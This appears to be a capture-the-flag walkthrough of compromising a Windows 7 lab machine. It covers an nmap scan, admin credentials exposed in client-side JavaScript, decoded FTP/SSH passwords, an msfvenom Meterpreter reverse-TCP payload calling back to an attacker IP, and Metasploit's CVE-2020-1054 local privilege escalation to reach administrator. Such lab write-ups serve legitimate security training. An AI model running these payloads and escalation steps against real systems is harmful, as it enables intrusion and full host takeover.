Finding the target + initial scan

image-20250425210703968

┌──(root㉿kali)-[~]
└─# nmap -sV -sC 192.168.106.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 09:03 EDT
Nmap scan report for 192.168.106.135
Host is up (0.00037s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8080/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: We Are Sorry
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:35:C5:3D (VMware)
Service Info: Host: ALWAYS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Always-PC
| NetBIOS computer name: ALWAYS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-25T21:04:48+03:00
| smb2-time:
| date: 2025-04-25T18:04:48
|_ start_date: 2025-04-25T18:01:03
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ALWAYS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:35:c5:3d (VMware)
|_clock-skew: mean: 3h59m59s, deviation: 1h43m55s, median: 4h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.90 seconds
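Before moving on, it helps to turn the scan into an explicit checklist. The block below is an added example, not part of the original writeup: a small parser for nmap's normal (non-XML) output that pulls out the open ports with their NSE script lines and maps them to the first manual checks the scan justifies (anonymous FTP, directory brute-force on the web ports, credential reuse over SMB/SSH, and the SMB signing result from the host scripts). The function names and triage rules are my own; the sample input is the port table and host-script section of the scan above, embedded so it runs offline.

```python
import re

# Constructed sample: the port table and host-script section of the scan above,
# embedded so the example runs offline. In practice feed it saved output (nmap -oN).
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
8080/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: We Are Sorry

Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
|_ message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_scan(text):
    """Parse nmap normal output into ({port: info}, host_script_lines).

    A port line looks like '445/tcp open microsoft-ds ...'. The '|' / '|_' lines that
    follow belong to that port's NSE scripts until the next port line. Everything
    under 'Host script results:' is host-level (smb-security-mode, nbstat, ...).
    """
    ports, host_scripts = {}, []
    current, in_host = None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Host script results"):
            in_host, current = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            current = int(m.group(1))
            ports[current] = {"proto": m.group(2), "state": m.group(3),
                              "service": m.group(4), "version": m.group(5).strip(),
                              "scripts": []}
        elif line.startswith("|"):
            body = line.lstrip("|_ ").strip()
            if in_host:
                host_scripts.append(body)
            elif current is not None:
                ports[current]["scripts"].append(body)
    return ports, host_scripts


def triage(text):
    """Map the parsed scan to the manual checks worth doing first, as (port, note) pairs."""
    ports, host_scripts = parse_scan(text)
    todo = []
    for port, p in sorted(ports.items()):
        if p["state"] != "open":
            continue
        svc = p["service"]
        if svc == "ftp":
            todo.append((port, "try anonymous FTP login"))
        elif svc == "http":
            todo.append((port, "directory brute-force and read page source"))
            if any("TRACE" in s for s in p["scripts"]):
                todo.append((port, "TRACE enabled (finding for the report, not an entry point)"))
        elif svc == "microsoft-ds":
            todo.append((port, "enumerate SMB shares; reuse any credentials found"))
        elif svc == "ssh":
            todo.append((port, "reuse any credentials found over SSH"))
    # Host-level finding: signing not enforced means an NTLM relay is possible if
    # authentication can be coerced; worth recording even if not used on this box.
    joined = "\n".join(host_scripts)
    if "message_signing: disabled" in joined or "not required" in joined:
        todo.append((445, "SMB signing not enforced: NTLM relay is viable if auth can be coerced"))
    return todo


if __name__ == "__main__":
    for port, note in triage(SAMPLE_SCAN):
        print(f"{port:>5}  {note}")
```

The ordering the parser produces (FTP first, then the web ports, then SMB/SSH for credential reuse) is exactly the order the rest of this writeup follows.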

Based on the information gathered, let's start trying things.

FTP (port 21): anonymous login attempt

image-20250425212324213

That failed, so on to the next step.

Directory brute-force on port 8080

image-20250425212352520

The scan turns up an admin login page.

image-20250425212415963

<script>
function validateForm() {
    const username = document.getElementById("username").value;
    const password = document.getElementById("password").value;
    const errorMessage = document.getElementById("errorMessage");

    // The check runs entirely in the browser against literal values, so anyone
    // who views the page source can read the admin credentials.
    if (username === "admin" && password === "adminpass123") {
        return true;
    }

    errorMessage.textContent = "Invalid Username Or Password!";
    return false;
}
</script>
The password is handed to you: the login check is done client-side in JavaScript, so the credentials sit in the page source.

image-20250425212649649

image-20250425212740140

Inside the admin panel we obtain an FTP login user.

image-20250425213103738

After logging in to FTP, gather information.

image-20250425213045943

image-20250425213406673

Found some information, including the login password for the user always.

It is base64-encoded; decoding it gives the plaintext.

Trying to log in with it fails.

Both SMB and SSH reject it.

…..

So far we have two username/password pairs:

always:YouCantFindMe.!.!
ftpuser:KeepGoingBro!!!

Try ftpuser:KeepGoingBro!!! instead.

SMB: the IPC$ connection succeeds, but no shares are visible.

SSH succeeds.

image-20250427175514194

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.127 lport=6000 -f exe -o test.exe

This generates a Meterpreter reverse-TCP executable (LHOST/LPORT are the attacking host and the port it will listen on).

Upload it to the target (the SSH session from above works for the transfer).

image-20250427175647234

image-20250427175448657

Start the handler on the attacking host, then run the file on the target.

image-20250427180027796

No flag is readable as the current user.

Privilege escalation

Use multi/recon/local_exploit_suggester

It lists twelve candidate local exploit modules.

image-20250427181131466

The sixth one worked.

image-20250427183716856

bg                                              # background the current Meterpreter session
use multi/recon/local_exploit_suggester
set session 1
run                                             # enumerate local privilege-escalation modules likely to work
use windows/local/cve_2020_1054_drawiconex_lpe
set session 1
run                                             # privilege escalation

The first flag is on always's desktop.

image-20250427183827368

The second flag is on the administrator's desktop.

image-20250529213112036